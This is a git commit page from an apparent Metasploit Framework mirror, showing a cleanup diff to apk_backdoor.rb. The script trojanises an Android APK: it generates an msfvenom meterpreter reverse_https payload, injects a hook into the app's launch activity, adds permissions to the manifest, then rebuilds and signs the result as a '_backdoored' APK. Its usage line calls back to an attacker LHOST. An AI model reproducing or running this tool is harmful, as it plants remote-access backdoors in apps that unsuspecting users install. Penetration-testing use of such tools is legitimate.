infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

clean up apk_backdoor.rb

bug/bundler_fix
Tim 2015-12-22 06:10:15 +00:00
parent ad0ff2ea2f
commit d1ed363a94
1 changed files with 10 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
tools/exploit/apk_backdoor.rb
View File

@ -11,6 +11,10 @@ require 'fileutils'
require 'optparse'
require 'open3'
def usage
$stderr.puts "Usage: #{$0} [target.apk] [msfvenom options]\n"
$stderr.puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n"
end
def run_cmd(cmd)
begin
@ -142,8 +146,7 @@ end
apkfile = ARGV[0]
unless apkfile && File.readable?(apkfile)
$stderr.puts "Usage: #{$0} [target.apk] [msfvenom options]\n"
$stderr.puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n"
usage
exit(1)
end
@ -173,9 +176,8 @@ begin
opts+=" "
}
rescue
$stderr.puts "Usage: #{$0} [target.apk] [msfvenom options]\n"
$stderr.puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n"
$stderr.puts "[-] Error parsing msfvenom options. Exiting.\n"
usage
exit(1)
end
@ -183,7 +185,7 @@ end
tempdir = Dir.mktmpdir
print "[*] Generating msfvenom payload..\n"
msfvenom_path = File.expand_path(File.join(File.dirname(__FILE__), "..", "msfvenom"))
msfvenom_path = File.expand_path(File.join(File.dirname(__FILE__), "..", "..", "msfvenom"))
res = run_cmd("#{msfvenom_path} -f raw #{opts} -o #{tempdir}/payload.apk 2>&1")
if res.downcase.include?("error")
$stderr.puts res
@ -230,14 +232,14 @@ payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/
hookedsmali = activitysmali.gsub(activitycreate, payloadhook)
print "[*] Loading ",smalifile," and injecting payload..\n"
File.open(smalifile, "wb") {|file| file.puts hookedsmali }
injected_apk=apkfile.split(".")[0] + "_backdoored.apk"
injected_apk = apkfile.sub('.apk', '_backdoored.apk')
print "[*] Poisoning the manifest with meterpreter permissions..\n"
fix_manifest(tempdir)
print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n"
print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n"
run_cmd("apktool b -o #{injected_apk} #{tempdir}/original")
print "[*] Signing #{injected_apk} ..\n"
print "[*] Signing #{injected_apk}\n"
run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey")
FileUtils.remove_entry tempdir